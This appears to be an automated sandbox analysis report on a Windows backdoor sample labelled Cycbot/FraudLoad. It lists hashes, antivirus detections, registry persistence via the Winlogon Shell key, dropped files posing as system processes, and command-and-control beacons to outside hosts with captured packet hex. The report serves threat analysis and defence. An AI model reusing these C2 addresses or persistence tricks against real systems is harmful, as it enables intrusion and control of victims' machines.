Analysis Date2014-08-03 13:14:56
MD5e831250e5fb166b4b8e2c8d8ac55344d
SHA183bbb0fab00f10db762c7c433ee4645d5b0788d1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5c72f0467756d07409ab0bedd28d9715 sha1: ef2387bf745a917af033b273a8ecff3957d1bd40 size: 109056
Section.rdata md5: 510c3df94d4ffc243b60a93c0077d056 sha1: 4d233115434e9cb2343bc4b9fa4ecef2adeb8e82 size: 512
Section.data md5: 581c1ce1e58ac6acaec9bd8a2184dbae sha1: 4b2a6dbcffe2235f9737dcc1c6a610527b1c2fa9 size: 22528
Section.rsrc md5: 0a879b08cb2ef397db99d6f48ea30cc8 sha1: 4a02f20e9d792e8037cecb8d33903175e8acfc92 size: 1024
Timestamp2005-10-13 03:29:30
VersionPrivateBuild: 1394
PEhash32147b317686e3a10e6eaace412824ef8ce91b6b
IMPhashb0ed3222f9dbbd27e050796bc2323500
AV360 SafeGen:Heur.FKP.6
AVAd-AwareGen:Heur.FKP.6
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Downloader.Fraudload.Hhn
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Fraudload-1183
AVEmsisoftGen:Heur.FKP.6
AVEset (nod32)Win32/Kryptik.IVO
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Heur.FKP.6
AVGrisoft (avg)Cryptic.BNC
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan-Downloader.Win32.FraudLoad.hhn
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.FKP.6
AVNormanwinpe/Cycbot.AW
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)TrojanDownloader.FraudLoad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSdolbyaudiodevice.com
Winsock DNSzoneck.com
Winsock DNS127.0.0.1
Winsock DNSblenderartists.org
Winsock DNSzonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSblenderartists.org
Type: A
162.159.251.137
DNSblenderartists.org
Type: A
198.41.249.137
DNSzonejm.com
Type: A
192.241.157.178
DNSzoneck.com
Type: A
204.93.213.45
DNSxibudific.cn
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://blenderartists.org/external/Banners/facebook2.jpg?tq=gJ4WK%2FSUh7TFk0R8oY%2BQtMWTUj26kJH7yZZRK%2B%2FbxWq1SfkIYUBM
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 162.159.251.137:80
Flows TCP192.168.1.1:1033 ➝ 192.241.157.178:80
Flows TCP192.168.1.1:1034 ➝ 204.93.213.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f657874 65726e61 6c2f4261   GET /external/Ba
0x00000010 (00016)   6e6e6572 732f6661 6365626f 6f6b322e   nners/facebook2.
0x00000020 (00032)   6a70673f 74713d67 4a34574b 25324653   jpg?tq=gJ4WK%2FS
0x00000030 (00048)   55683754 466b3052 386f5925 32425174   Uh7TFk0R8oY%2BQt
0x00000040 (00064)   4d575455 6a32366b 4a483779 5a5a524b   MWTUj26kJH7yZZRK
0x00000050 (00080)   25324225 32466278 57713153 666b4959   %2B%2FbxWq1SfkIY
0x00000060 (00096)   55424d20 48545450 2f312e30 0d0a436f   UBM HTTP/1.0..Co
0x00000070 (00112)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000080 (00128)   0a486f73 743a2062 6c656e64 65726172   .Host: blenderar
0x00000090 (00144)   74697374 732e6f72 670d0a41 63636570   tists.org..Accep
0x000000a0 (00160)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 6a304f6a 62777667 53393137   fBvcj0OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a0d0a 55736572 2d416765   .3......User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 6a304f6a 62777667 53393137   fBvcj0OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a0d0a 55736572 2d416765   .3......User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         


Strings
.

040904b0
1394
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<\!/\{
'	2R"`(
 "4"t^
5Mz?mS
5ym4\9>/
)7tn7`
7}-w7F
8cH-=a
-8cN!uMp
=8N,%6m
}'9px)u
B=aq+#b|
B-=uzY
@c`.3tB
_c!=c#
cccCx[
cc,,'j
CreateStdAccessibleObject
@.data
'ddH'd
dHcj4H
EnumResourceNamesA
e\sA!U
ExitProcess
F0OFM1c
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
GlobalDeleteAtom
H;,*j=w
Jn\:l-;#
JRichu
Jt~D=TEn|
@*KAq.5
KERNEL32.dll
Kj9L*X
LresultFromObject
mkE>_B
m}mm|E
mzh|Y:
N7*+.@
*NF,'W
N)+mz:
NN(k9_
No-6hU
!nzIG`
oI<}7s
OLEACC.dll
,oo-w)s
$)r;}6o
`.rdata
r;}FpY
~\%_sK
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
U-4R'j
UM4[I4
UnhandledExceptionFilter
Voi|);
[vZ?fp
;{wF"+
X(+z4L
;>/?.Y
YO>Kvv*"
YXXSz^5x
Y=\Yu5
z6jw87
Z?o4L3
[~{[Zy